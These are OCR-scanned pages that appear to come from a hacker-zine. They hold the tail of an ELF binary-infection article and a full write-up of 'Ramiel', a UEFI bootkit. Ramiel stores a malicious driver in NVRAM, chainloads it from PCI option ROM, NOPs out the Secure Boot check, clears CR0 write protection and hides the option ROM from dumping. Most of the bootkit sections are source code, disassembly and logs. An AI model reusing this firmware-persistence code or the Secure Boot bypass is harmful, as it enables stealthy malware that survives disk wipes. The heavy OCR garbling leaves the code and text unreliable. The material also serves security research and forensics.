(16) Updating sections past text section @ addr 0x2040 
(17) Updating sections past text section @ addr O0x3df8 
(18) Updating sections past text section @ addr 0x3e00 
(19) Updating sections past text section @ addr 0x3e08 
(20) Updating sections past text section @ addr Ox3fc8 
(21) Updating sections past text section @ addr Ox3fe8 
(22) Updating sections past text section @ addr 0x4008 
(23) Updating sections past text section @ addr 0x4010 
(24) Updating sections past text section @ addr 0x0 
(25) Updating sections past text section @ addr 0x0 
(26) Updating sections past text section @ addr 0x0 
(27) Updating sections past text section @ addr 6x0 
writing payload into the binary 
sad@p@Arch-Deliberate testlib2]$ mv testlib.so-infected testlib.so 
i sadOp@Arch-Deliberate testlib2]§ _/main 
ello -- this is a non destructive payloadThis is funcl 
[ sadOp@Arch-Deliberate testlib2]$ 


In our ‘r2 example, we overwrote the relocation entry, meaning the original entry never got executed; this is a bad 


practice as relocation entries are essential to the program function (often associated with critical initialization 
routines in both standard executables and shared objects). In ‘dOzer’, this is handled by having the parasitic code 
pass execution to the code/function that existed in the relocation record pre-infection. As stated earlier in the article, 
one of the goals of binary infection is to leave the binary in a state where it can function as if it was not infected. 


There are limits to Relative Relocation Poisoning/Hijacking. For instance, not all relative relocations associate with 
executable code. Some are associated with data objects. Look at the ‘readelf output of a simple “hello world” 
application dynamically linked against “libc*. The ‘readelf application is being run with flag “-s” to look for symbols 
(second run of ‘readelf in the following screenshot), and its output is piped to grep to match symbols with their 
offsets. We can see that the first two offsets gathered from the relocation record printout have symbol types *FUNC* 
(defined as *STT_FUNC*% in “elf.h*), which indicates the symbol is associated with a function or executable code. The 
last ‘readelf run with offset 0x4010 shows this offset is of type OBJECT, which lets us know the relocation is 
associated with data. You would need to avoid hijacking these entries. 


[sad@p@Arch-Deliberate experimental]$ readelf -r helloworld64_ dynamic 


Relocation section 


Offset 
000000003dd0 
000000003dd8 
000000004010 
000000003FcO 
000000003fc8 
000000003FdO 
000000003fd8 
000000003Fed 


"_rela.dyn' at offset 0x558 contains 8 entries: 
Info Type Sym. Value Sym. Name + Addend 
000000000008 R_X86_64_RELATIVE 1130 
000000000008 R_X86_64 RELATIVE 10e0 
000000000008 R_X86_64 RELATIVE 4010 
000100000006 R_X86_64 GLOB_DAT 0000000000000000 __libc_start_main@GLIBC_2.34 + 0 
000200000006 R_X86_64 GLOB DAT 0000000000000000 ITM deregisterTM[...] + 0 
000400000006 R_X86_64 GLOB_DAT 0000000000000000 __gmon_start_ + 
000500000006 R_X86_64 GLOB DAT 0000000000000000 ITM registerTMCl[...] + 0 
000600000006 R_X86_64 GLOB DAT 9000000000000000 _ cxa_finalize@GLIBC 2.2.5 + 0 


Relocation section ‘.rela.plt' at offset 0x618 contains 1 entry: 

Offset Info Type Sym. Value Sym. Name + Addend 
000000004000 000300000007 R_X86_64 JUMP_SLO 0000000000000000 puts@GLIBC_2.2.5 + 0 
[sad@p@Arch-Deliberate experimental]$ readelf -s helloworld64 dynamic | grep 1130 

10: 0000000000001130 @ FUNC LOCAL DEFAULT 14 frame_dummy 
[sadOp@Arch-Deliberate experimental]$ readelf -s helloworld64 dynamic | grep 10e0 

7: 00000000000010e0 @ FUNC LOCAL DEFAULT 14 __ do global_dtors_aux 
[sad@p@Arch-Deliberate experimental]$ readelf -s helloworld64 dynamic | grep 4010 

27: 0000000000004010 © OBJECT GLOBAL HIDDEN 24 __dso handle 
[sadOp@Arch-Deliberate experimental]$ 


There are two solutions | can think of (one implemented in dOzer): to check if the offset is within the *.init_array* 
section since that section only holds function pointers and only contain entries pointing to code. The following 
screenshot illustrates the function in “dOzer to do just that. 


withInSectionVirtualAddrSpace(sectionName 


The other solution requires us to check the symbol tables to make sure the associated is of type *STT_FUNC* or 
*FUNC* (readelf version). However, there is a drawback, and it’s not unusual for production binaries to have their 
.symtab removed in dynamically linked binaries to decrease file size. Finally, statically compiled and linked binaries 
(ELF type ET_EXEC) do not utilize relative relocations (R_X86_64_RELATIVE), so Relative Relocation 
Poisoning/Hijacking will not work. 


| hope this helps demystify ELF binary infection, and informs efforts to both further the art of exploitation, and the 
forensic analysis & defeat of malicious actors. 


Credit - *To Alpinista for his edits.* 
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Abstract: 


The majority of UEFI bootkits persist within the EFl system partition. Disk persistence is usually not ideal as it is 
easily detectable and cannot survive OS re-installations and disk wipes. Furthermore, for almost all platforms, 
secure boot is configured to check the signatures of images stored on disk before they are loaded. 


Recently, a new technique [6] of persisting in the option rom of PCI cards was discovered. The technique allows 
bootkits to survive OS re-installations and disk wipes. In the past, edk2 configured secure boot to allow unsigned 
option ROMs to be executed [8], but since then, it has been patched for most platforms. PCI option ROM 
persistence is not without limitations: 

1. PCI option ROM is often small, usually within the range of ~32 - ~128 KB, providing little room for complex 
malware. 

2. PCI option ROM can be dumped trivially as it is mapped into memory. 


Ramiel attempts to mitigate these flaws. Leveraging motherboard’s NVRAM, it can utilize ~256 KB of persistent 
storage on certain systems, which is greater than what current option rom bootkits can utilize. It is also difficult to 
detect Ramiel since it prevents option ROMs from being mapped into memory, and as vault7 [7] states: “there is no 
way to enumerate NVRAM variables from the OS... you have to know the exact GUID and name of the variable to 
even determine that it exists.” Ramiel is able to tamper with secureboot status for certain hypervisors. 


0. Overview 


The order in which sections are presented is the order in which Ramiel performs operations. 


1. Infection: 


1.1 Ramiel writes a malicious driver to NVRAM 
1.2 Ramiel writes chainloader to PCI option ROM 


2. Subsequent Boots: 
2.3 Ramiel patches secure boot check in Loadlmage to chainload unsigned malicious driver 
2.4 Ramiel prevents OPROM from being mapped into memory by linux kernel 
2.5 chainloader loads the malicious driver from NVRAM 


Misc: 
2.1 OVMF misconfiguration allows for unsigned PCI option ROMs to execute with secure boot enabled 
2.2 Overview of PCI device driver model 
2.6 Source debugging OVMF with gdb 


Initial Infection: 
OEM firmware update tool—+jNIC PCI option ROM 


dropper 
chainloader driver 


SetVariable() 
in NVRAM 


malicious driver 
(chunks) 


Next Reboot: DXE dispatcher loads unsigned chainloader driver 
(ignores secure boot violation due to misconfiguration) 


chainloader 


v 
chainloader: patch secureboot check in CoreLoadImage 
chainloader: zero XROMBAR 


v 
chainloader: load malicious driver chunks from NVRAM 


malicious driver 


Ramiel has not been tested on bare metal although theoretically it should work with secure boot disabled. 


1.0 Infection 


On the version of OVMF tested, QueryVariablelnfo returned: 


max variable storage: 262044 B, 262 KB 
remaining variable storage: 224808 B, 224 KB 
max variable size: 33732 B, 33 KB 


In order to utilize all of 262 KB of NVRAM, the malicious driver must be broken into 33 KB chunks stored in separate 
NVRAM variables. Since the size of the malicious driver is unknown to the chainloader, Ramiel creates a variable 
called “guids” storing the GUIDs of all chunk variables. the GUID of the “guids” variable is fixed at compile time. 


Example NVRAM layout: 
GUID of guids (89547266-0460-—43b3-9dfc-—e4d627e6629) is known by the chainloader 


uids——89547266-0460-—43b3-9df c-e4d627e6629 
0eb06226-a02e-49be—bd56-866b328b44a3 


c62104c3-@b2a—4c5a—9b1d-17780ebeaf 9Ff 
b@d@f31d-88e0-—4cbf-—a589-ccc35e4569ab 


Qeb06226-a02e-—49be—bd56-866b328b44a3. 
[-nax var size chunk 1 of driver> 

c62104c3-@b2a—4c5a—9b1d-17780ebeaf 9Ff 
[<nax var size chunk 2 of driver> 

b0d0f31d-88e0@-—4cbf-—a589-ccc35e4569ab 
[<nax var size chunk 3 of driver> 


runtime.c excerpt: 


struct stat stat; 
int fd = open(argv[3], O_RDONLY) ; 
fstat(fd, &stat); 


uint8_t *buf = malloc(stat.st_size); 
read(fd, buf, stat.st_size); 


int attributes = EFI_VARIABLE_NON_VOLATILE | EFI_VARIABLE_BOOTSERVICE_ACCESS | \ 
EFI_VARIABLE_RUNTIME_ACCESS; 
efi_guid_t guid; 
efi_str_to_guid(argv[1], &guid); 
ret = efi_set_variable(guid, argv[2], buf, stat.st_size, attributes, 777); 
if (ret != 0 
return —1; 
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To write the variables to NVRAM, Ramiel uses the libefivar library and its wrapper 
for the UEFI runtime service SetVariable: 


int efi_set_variable(efi_guid_t guid, 
const char «name, 


void xdata, 


size_t data_size, 
uint32_t attributes); 


Ramiel sets the attributes: 
EFI_VARIABLE_NON_VOLATILE to store the variable in NVRAM, 
EFI_VARIABLE_BOOTSERVICE_ACCESS so the chainloader may access it, and 
EFI_VARIABLE_RUNTIME_ACCESS to ensure the variable has been written. 


Importantly, EFl_ VARIABLE_RUNTIME_ACCESS is unset during subsequent boots to prevent the variable from 
being dumped from the OS even if its guid is known. 


Option ROM emulation in QEMU is as simple as passing a romfile= param to a emulated NIC device like so [1]: 
-device e1000e, romfile=chainloader.efirom 
For bare metal, it is usually possible to flash PCI option rom via OEM firmware update utilities like Intel Ethernet 


Flash Firmware Utility [9]. Ramiel currently does not implement utilizing such utilities to infect virtual machines that 
are passed healthy romfiles as it is impossible. Ramiel requires an infected romfile to be passed to qemu. 


Ramiel currently does not implement utilizing such utilities to infect virtual machines that are passed healthy 
romfiles. Ramiel requires an infected romfile to be passed to QEMU. 


2.0 Subsequent Boots 


Option ROM verification behavior is controlled by a PCD value PedOptionRomImageVerificationPolicy in the edk2 
SecurityPkg package. the possible values for the PCD are: 


## Pcd for OptionRom. 

# Image verification policy settings: 
ALWAYS_EXECUTE @x00000000 
NEVER_EXECUTE @x00000001 
ALLOW_EXECUTE_ON_SECURITY_VIOLATION @x00000002 


DEFER_EXECUTE_ON_SECURITY_VIOLATION 0x00000003 

DENY_EXECUTE_ON_SECURITY_VIOLATION Q@x00000004 

QUERY_USER_ON_SECURITY_VIOLATION @x00000005 
gEfiSecurityPkgTokenSpaceGuid.PcdOptionRomImageVerif icationPolicy | 0x0 | UINT32 |- 
@x00000001 


Microsoft recommends platforms to set this value to DENY_EXECUTE_ON_SECURITY_VIOLATION (0x04) [8], 
however, on the latest version of edk2 the PCD is set to always execute for many OVMF platforms: 


OvmfPkg/OvmfPkg1a32X64.dsc:653: 

gEfiSecurityPkgTokenSpaceGuid.PcdOptionRomImageVerificationPolicy | 0x00 

OvmfPkg/AmdSev/AmdSevx64.dsc:525: 
gEfiSecurityPkgTokenSpaceGuid.PcdOptionRomImageVerificationPolicy | 0x00 

OvmfPkg/IntelTdx/IntelTdxx64.dsc:512: 
gEfiSecurityPkgTokenSpaceGuid.PcdOptionRomImageVerificationPolicy | 0x00 

OvmfPkg/XenPlatformPei/XenP lat formPei. inf:90: 
gEfiSecurityPkgTokenSpaceGuid.PcdOptionRomImageVerificationPolicy 


OvmfPkg/Microvm/Microvmx64.dsc:620: 
gEfiSecurityPkgTokenSpaceGuid.PcdOptionRomImageVerificationPolicy | 0x00 
OvmfPkg/OvmfPkgIa32.dsc:641: 
gEf iSecurityPkgTokenSpaceGuid.PcdOptionRomImageVerificationPolicy | 0x00 
OvmfPkg/Bhyve/Bhyvex64.dsc:562: 


gEfiSecurityPkgTokenSpaceGuid.PcdOptionRomImageVerificationPolicy | 0x00 
OvmfPkg/CloudHv/C lLoudHvxX64.dsc:622: 

gEf iSecurityPkgTokenSpaceGuid.PcdOptionRomImageVerificationPolicy | 0x00 
OvmfPkg/OvmfXen.dsc:508: 

gEfiSecurityPkgTokenSpaceGuid.PcdOptionRomImageVerificationPolicy | 0x00 
OvmfPkg/OvmfPkgX64.dsc:674: 

gEfiSecurityPkgTokenSpaceGuid.PcdOptionRomImageVerificationPolicy | 0x00 


During the dxe phase of EFI, the driver dispatcher will discover and dispatch all drivers it encounters, including driv- 
ers stored in PCI option rom. 


From edk2 docs:: “Drivers that follow the UEFI driver model are not allowed to touch any hardware in their driver en- 
try point. In fact, these types of drivers do very little in their driver entry point. They are required to register protocol 
interfaces in the Handle Database and may also choose to register HIl packages in the HII Database...” [13] 


Register driver binding protocol in DriverEntry: 


EFI_DRIVER_BINDING_PROTOCOL gTestDriverBinding = { 
DriverSupported, DriverStart, DriverStop, 
@x01, NULL, NULL}; 


EFI_STATUS EFIAPI DriverEntry(IN EFI_HANDLE ImageHandle, 
IN EFI_SYSTEM_TABLEx SystemTable) { 


gST = SystemTable; 

gBS = SystemTable->BootServices; 
gRT = SystemTable->RuntimeServices; 
gImageHandle = ImageHandle; 


EFI_STATUS status; 

status = EfiLibInstallDriverBindingComponentName2 
ImageHandle, // ImageHandle 
SystemTable, // SystemTable 
&gTestDriverBinding, // DriverBinding 
ImageHandle, // DriverBindingHandle 
NULL, NULL); 

return status; 


From edk2 docs: “A PCI driver must implement the EFI_DRIVER_BINDING_PROTOCOL containing the Support- 
ed(), Start(), and Stop() services. The Supported() service evaluates the ControllerHandle passed in to see if the 
ControllerHandle represents a PCI device the PCI driver can manage.” [14] 


Driver supported: (See next page) 


BOOLEAN Checke1@@@eNIC(EFI_HANDLE Controller, 
EFI_DRIVER_BINDING_PROTOCOL *+This) { 
EFI_STATUS status = EFI_SUCCESS; 
EFI_PCI_I0_PROTOCOL *Pcilo; 


PCI_TYPE@@ Pci; 
status = gBS->OpenProtocol(Controller, &gEfiPciloProtocolGuid, 
VOID **) &Pcilo, (*This)—>DriverBindingHandle, 
Controller, EFI_OPEN_PROTOCOL_BY_DRIVER) ; 
if (EFI_ERROR(status) || PciIo == ){ 
return ; 
} 


status = Pcilo->Pci.Read(Pcilo, 
Ef iPciloWidthUint32, 
0, 


UINT32), 
&Pci 


gBS->CloseProtocol(Controller, &gEfiPciloProtocolGuid, 
*This)->DriverBindingHandle, Controller); 


status == EFI_SUCCESS) { 


Originally, Ramiel utilized a manual mapper similar to shim to chainload the malicious driver without triggering a 
secure boot violation. However, it is far simpler to bypass secureboot status by patching a check in DxeCore.efi. 


When LoadImage is called on an unsigned image, the debug log in QEMU will show this message: 


[Security] 3rd party image[@] can be loaded after EndOfDxe: MemoryMapped(@x@, ... 
DxeImageVerificationLib: Image is not signed and SHA256 hash of image is not found 
in DB/DBX. 

The image doesn't pass verification: MemoryMapped (0x0, @x7D632000, @x7D6340CQ) 


The message is printed by DxelmageVerificationHandler in SecurityPkg/Library/DxelmageVerificationLib/Dxelma- 
geVerificationLib.c: 


1658> EFI_STATUS 
EFIAPI 
DxeImageVerificationHandler ( 


DEBUG( (DEBUG_INFO, "DxeImageVerificationLib: \ 
Image is not signed and %s hash of image is not found in DB/DBX.\n", 
mHashTypeStr) ); 


Setting a breakpoint at DxelmageVerificationHandler entry and backtracing shows: 


Thread 1 hit Breakpoint 1, DxeImageVerificationHandler ... 

(gdb) bt 

#0 DxeImageVerificationHandler ... 

#1 0x000000007e2af95b in ExecuteSecurity2Handlers ... 

#2 ExecuteSecurity2Handlers ... 

#3 0x000000007e27b22d in Security2StubAuthenticate ... 

#4 Qx000000007ef94dee in CoreLoadImageCommon.constprop.®@ ... 
at ... edk2/MdeModulePkg/Core/Dxe/Image/Image. c: 1273 

#5 0x000000007ef7b88e in CoreLoadImage ... 
at ... edk2/MdeModulePkg/Core/Dxe/Image/Image.c:1542 


Ramiel patches this check in CoreLoadilmageCommon with nops. 


MdeModulePkg/Core/Dxe/Image/Image.c: 


CoreLoadImageCommon | 


1269> if (gSecurity2 != )f 
SecurityStatus = gSecurity2—>FileAuthentication 
gSecurity2, 
OriginalFilePath, 
FHand. Source, 
FHand.SourceSize, 
BootPolicy 


1310> if (EFI_ERROR (SecurityStatus) && (SecurityStatus != EFI_SECURITY_VIOLATION) 
if (SecurityStatus == EFI_ACCESS DENIED) { 
*ImageHandle = H 
I 
Status = SecurityStatus; 
Image = ' 
goto Done; 


It is possible to find the address corresponding to a line of code via setting hardware breakpoints. Setting hardware 
breakpoints at lines 1269 and 1322 shows the start and end addresses of the code which Ramiel must patch. As 
there is no ASLR, these addresses do not change unless DxeCore.efi is recompiled. 


hw breakpoint keep y <MULTIPLE> 
y  x000000007ef94dbd in CoreLoadImageCommon.constprop.®@ at 
edk2/MdeModulePkg/Core/Dxe/Image/Image.c:1269 inf 1 

hw breakpoint keep y <MULTIPLE> 
y  0x000000007ef94eab in CoreLoadImageCommon.constprop.®@ at 
»+» @dk2/MdeModulePkg/Core/Dxe/Image/Image.c:1327 inf 1 


Disassembly of check in CoreLoadlmageCommon.constprop.0 before patch_sb: 


@x000000007ef94dbd <+2721>: 84 d2 00 00 0xd284(%rip) ,% 
@x@00000007eF94dc4 <+2728>: ; %6raXx ,% 
@x000000007ef94dc7 <+2731>: 0x7ef94e36 


Qx000000007eF94e9F <+2947>: 00 00 00 00 $0xO, (% ) 
@x000000007ef94ea6 <+2954>: 4) @x7ef9523b 
@x@00000007eT94eab <+2959>: 20 $O0x20 ,% 


Any write protection implemented via pagetables is bypassed trivially with the crO WP bit trick: 


clear_cr@_wp() { 
AsmWriteCr0(AsmReadCr@() & ~(1UL << 16)); 


set_cr@_wp() { 
AsmWriteCr@(AsmReadCrd | (IU <<) 16); 


It is possible to pattern scan memory for the check after finding the base address of DxeCore.efi via enumerat- 
ing ImageHandles in the handle database. Ramiel simply hardcodes the start and end address of where it should 
patch: 


#define PATCH_START 0x000000007ef94dbdu 
#define PATCH_END 0x000000007ef94eabu 


patch_sb() { 
clear_cr@_wp(); 
SetMem( (VOID *) PATCH_START, PATCH_END - PATCH_START, 0x9@); 
set_cr@_wp(); 


Disassembly of check in CoreLoadlmageCommon.constprop.0 after patch_sb: 


@x000000007ef94dbd <+2721>: 
@x@00000007ef94dbe <+2722>: 
Qx000000007ef94dbf <+2723>: 


@x000000007ef94ea9 <+2957>: 
@x000000007ef94eaa <+2958>: 
@x000000007ef94eab <+2959>: 


Ramiel calls Loadlmage successfully on an unsigned image: 
QEMU debug log: 


Loading driver at 0x0007D62F000 EntryPoint=0x0007D63045A helloworld_driver.efi 
InstallProtocolinterface: BC62157E-3E33-4FEC—9920-2D3B36D75@DF 7D635798 
ProtectUefilmageCommon — 0x7D635940 

— 0x000000007D62F000 — 0x00000000000020C0 


$ lspci -vv 
00:04.0 Ethernet controller: Intel Corporation 82574L Gigabit Network Connection 
Subsystem: Intel Corporation 82574L Gigabit Network Connection 


Region 0: Memory at c0860000 (32-bit, non-prefetchable) [size=128K] 
Region 1: Memory at c@840000 (32-bit, non-prefetchable) [size=128K] 
Region 2: I/0 ports at 6060 [size=32] 

Region 3: Memory at c@880000 (32-bit, non-prefetchable) [size=16K] 
Expansion ROM at 80050000 [disabled] [size=32K] 

Capabilities: <access denied> 

Kernel driver in use: e1000e 

Kernel modules: e1000e 


$ cd /sys/devices/pci0000: 00/0000:00:04.0 

$ echo 1 | sudo tee rom 

$ sudo dd if=rom of=/tmp/oprom. bin 

$ file /tmp/oprom.bin 

/tmp/oprom.bin: BIOS (ia32) ROM Ext. (56%*512) 


However, “There is a kernel boot parameter, pci=norom, that is intended to disable the kernel’s resource assignment 
actions for Expansion ROMs that do not already have BIOS assigned address ranges...” which “...only works if the 
Expansion ROM BAR is set to ‘0’ by the BIOS before hand-off.” [10] 


In order to prevent option ROM from being dumped, Ramiel clears XROMBAR in the PCI configuration header of 
the NIC and passes pci=norom to the kernel. In DriverStart, Ramiel opens the EFI_PCI_IO_PROTOCOL associated 
with the NIC controller and passes it to clear_oprom_bar: 


EFI_PCI_IO_PROTOCOL *Pcilo; 
status = gBS->OpenProtocol(Controller, &gEfiPciloProtocolGuid, 
VOID **) &PcilIo, This- jerBindingHandle, 
Controller, EFI_OPEN_PROTOCOL_BY_DRIVER) ; 
if (EFI_ERROR(status) || PciIo == NULL) { 
return status; 


} 


status = clear_oprom_bar(Pcilo) ; 


In clear_oprom_bar, Ramiel writes all zeros to the XROMBAR register (offset 0x30 within the PCI configuration 
headers) of the controller: 


UINT32 allones = 0x00000000; 
status = Pcilo—>Pci.Write(Pcilo, 
EfiPciloWidthUint32, 
0x30, 


1, 
&allones 


After, Ispci no longer displays the expansion ROM field and the ROM cannot be dumped without memory scanning: 


00:04.@ Ethernet controller: Intel Corporation 82574L Gigabit Network Connection 
Subsystem: Intel Corporation 82574L Gigabit Network Connection 


Region @: Memory at c0860000 (32-bit, non-prefetchable) [size=128K] 
Region 1: Memory at c0840000 (32-bit, non-prefetchable) [size=128K] 


Region 2: I/0 ports at 6060 [size=32] 

Region 3: Memory at c0880000 (32-bit, non-prefetchable) [size=16K] 
Capabilities: <access denied> 

Kernel driver in use: e1000e 

Kernel modules: e1000e 


To reassemble the malicious driver image, Ramiel first calls GetVariable on the “guids” variable, then calls GetVari- 
able on every guid stored in it and copies the chunks to a buffer: 


+TODO: remove runtime access flag from vars. 


#define GUIDS_VAR_NAME L"guids" 
#define GUIDS_VAR_GUID {@xBFB35F7E, @xFC44, @x41AE, \ 
{@x7C, @xD9, x68, OxA8, @x01, Ox@2, OxB9, OxD0}} 


UINTN parse_guids(CHAR16 **kvar_names_ptr, UINT8 xbuf, UINTN bufsize) { 
UINTN nguids = (bufsize / CHAR16)) / GUID_LEN; 
CHAR16 **guids = AllocateZeroPool(nguids * CHAR16 *) ) 
*Var_names_ptr = guids; 


for (UINTN i = @; i < nguids; i++) { 
CHAR16 *tmp = AllocateZeroPool((GUID_LEN * (CHAR16)) + (CHAR16) 
guids[i] = tmp; 
CopyMem(tmp, 
buf + (i * GUID_LEN * (CHAR16)), GUID_LEN * f (CHAR16) 


return nguids; 


EFI_STATUS 

EFIAPI 

nvram_chainload() 1 
EFI_STATUS status; 


UINT8 *buf; 
UINTN bufsize; 
EFI_GUID guids_var_guid = GUIDS_VAR_GUID; 
gRT->GetVariable( 

GUIDS_VAR_NAME, 

&guids_var_guid, 

&bufsize, 

); 


buf = AllocateZeroPool(bufsize) ; 


gRT->GetVariable( 
GUIDS_VAR_NAME, 
&guids_var_guid, 
&bufsize, 
buf); 


CHAR16 **var_names; 
UINTN nguids = parse_guids(&var_names, buf, bufsize); 


EFI_GUID *guids = AllocateZeroPool(nguids * EFI_GUID) ); 


for ( i= 0; i < nguids; i++) { 
StrToGuid(var_names[i], S&guids[i]); 


UINT64 size = 0; 
UINT64 xsizes = AllocateZeroPool(nguids * UINT64) ) ; 


for ( i = 0; i < nguids; i++) { 
gRT->GetVariable 
var_names [il], 
&(guids[i]), 


’ 


&(sizes[i]), 


’ 


size += sizes[il; 


UINT8 xapplication_ptr = AllocatePages(EFI_SIZE_TO_PAGES 


UINT64 offset = 0; 
for ( i = 0; i < nguids; i++) { 
gRT->GetVariable 
var_names[il, 
&(guids[i]), 
, 
&(sizes[i]), 
application_ptr + offset); 
offset += sizes[i]; 


MEMORY_DEVICE_PATH mempath = MemoryDevicePathTemplate; 
mempath.Node1.StartingAddress = (EFI_PHYSICAL_ADDRESS) (UINTN) application_ptr; 
mempath.Nodel.EndingAddress = \ 

(EFI_PHYSICAL_ADDRESS) ((UINTN) application_ptr) + size; 


EFI_HANDLE NewImageHand le; 
status = gBS->LoadImage( 
Q, 
gImageHandle, 
EFI_DEVICE_PATH_PROTOCOL +) &mempath, 
application_ptr, 
size, 
&NewImageHand le) ; 
if (EFI_ERROR(status)) { 
return status; 


status = gBS->StartImage(NewImageHandle, 
if (EFI_ERROR(status)) { 
return status; 


return status; 


Then it calls Loadimage on a memory device path pointing to the buffer [12]: 


{ 
MEMMAP_DEVICE_PATH Node1; 
EFI_DEVICE_PATH_PROTOCOL End; 
} ; 


STATIC CONST MEMORY_DEVICE_PATH MemoryDevicePathTemplate = 
{ 


HARDWARE_DEVICE_PATH, 
HW_MEMMAP_DP, 
{ 
(UINT8) ( MEMMAP_DEVICE_PATH) ) , 
(UINT8) ( (MEMMAP_DEVICE_PATH)) >> 8), 
ire 


END_DEVICE_PATH_TYPE, 
END_ENTIRE_DEVICE_PATH_SUBTYPE, 
(EFI_DEVICE_PATH_PROTOCOL), @ 


I; 


MEMORY_DEVICE_PATH mempath = MemoryDevicePathTemplate; 
mempath.Node1.StartingAddress = (EFI_PHYSICAL_ADDRESS) (UINTN) application_ptr; 


mempath.Node1.EndingAddress = (EFI_PHYSICAL_ADDRESS) ((UINTN) application_ptr) + size; 


EFI_HANDLE NewImageHandle; 

status = gBS->LoadImage( 
Q, 
gImageHandle, 
(EFI_DEVICE_PATH_PROTOCOL *) &mempath, 
application_ptr, 
size, 
&NewImageHand le) ; 


com1 log: 


[ramiel]: 
[ramiel]: 
[ramiel]: 
[ramiel]: 
[ramiel]: 
[ramiel]: 
[ramiel]: 
[ramiel]: 
[ramiel]: 


[ramiel]: 
[ramiel]: 
helloworld !! : D 


[ramiel]: 


nic found @ DevicePath: PciRoot(@x@)/Pci(@x4, 0x) 
print_var_info — max_var_storage —> 262044 B 
print_var_info -— remaining_var_storage —> 224808 B 
print_var_info -— max_var_size -—> 33732 B 
DriverStart -— vendor id, device id -—> 8086, 10D3 
DriverStart - xrombar -—> 0 

DriverStart - command register —> 7 


patch_sb — patching secureboot check from —> 7EF94DBD to 7EF94EAB... 


patch_sb — completed 
nvram_chainload — guid 02015480-B875-—42CC-B73C-7CD6D7A14@D5 
nvram_chainload - LoadImage of target completed 


nvram_chainload — StartImage completed 


1. Follow the Debian wiki instructions to setup a VM with secure boot [15] 


2. Compile OVMF with -D SECURE_BOOT_ENABLE 


3. Copy OVMF_VARS.fd and OVMF_CODE.fd to the secureboot-vm directory 


4. Run: 
$ ./start-vm.sh 


5. Exit the VM, then run: 
$ ./gen_symbol_offsets.sh > gdbscript 
$ ./start-vm.sh -s -S 


$ gdb 


(gdb) source gdbscript 
(gdb) target remote localhost:1234 


start-vm.sh [15] 


#!/bin/bash 
set -Eeuxo pipefail 


LOG="debug. Log" 

MACHINE_NAME="disk" 

QEMU_IMG="${MACHINE_NAME}. img" 

SSH_PORT="5555" 

OVMF_CODE_SECURE="o0vmf /OVMF_CODE_SECURE. fd" 
OVMF_VARS_ORIG="/usr/share/OVMF/OVMF_VARS_4M.ms. fd" 
OVMF_VARS_SECURE="ovmf /OVMF_VARS_4M_SECURE.ms. fd" 


if [ ! -e "${QEMU_IMG}" ]; then 
qemu-img create -f qcow2 "${QEMU_IMG}" 8G 
fi 


if [ ! -e "${OVMF_VARS}" ]; then 
cp "${OVMF_VARS_ORIG}" "${OVMF_VARS}" 
fi 


qemu-system-x86_64 \ 
-enable-kvm \ 
-cpu host -smp cores=4,threads=1 -m 2048 \ 
-object rng-random, filename=/dev/urandom, id=rng@ \ 
-device virtio-rng-pci,rng=rng@ \ 
-net nic,model=virtio -net user,hostfwd=tcp: :${SSH_PORT}-:22 \ 
-name "${MACHINE_NAME}" \ 
-drive file="${QEMU_IMG}", format=qcow2 \ 
-vga virtio \ 
-machine q35,smm=on \ 
-global driver=cfi.pflash@1,property=secure,value=on \ 
-drive format=raw, file=fat:rw:fs1 \ 
-drive if=pflash, format=raw, unit=0, file="${OVMF_CODE_SECURE}", readonly=on \ 
-drive if=pflash, format=raw, unit=1, file="${OVMF_VARS_SECURE}" \ 
-debugcon file:"${LOG}" -global isa-—debugcon. iobase=0x402 \ 
-global ICH9-LPC.disable_s3=1 \ 
-serial file:comi.log \ 
-device e1000e, romfile=chainloader.efirom \ 
$@ 


gen_symbol_offsets.sh, adapted from [5] 


#!/bin/bash 


LOG="../debug. log" 
PEINFO="peinfo/peinfo" 


cat ${LOG} | grep Loading | grep -i efi | while read LINE; do 
BASE=""“echo ${LINE} | cut -d " " -f4°" 
NAME=""echo ${LINE} | cut -d "" -f6 | tr -d "[:cntrl:]"*" 
EFIFILE=""find <path to edk2>/Build/MdeModule/DEBUG_GCC5/X64 -name ${NAME} \ 
-maxdepth 1 -type f*" 
if [ -z "$EFIFILE" ] 
then 


else 
ADDR="""${PEINFO} ${EFIFILE} \ 
| grep -A 5 text | grep VirtualAddress | cut -d " " -f2*" 
TEXT=""python -c "print (hex(${BASE} + ${ADDR}))"*" 
SYMS="""echo ${NAME} | sed -e "s/\.efi/\.debug/g"*" 
SYMFILE="*find <path to edk2>/Build/MdeModule/DEBUG_GCC5/X64 -name ${SYMS} \ 
-maxdepth 1 -type f*" 
echo “add-symbol-file ${SYMFILE} ${TEXT}" 
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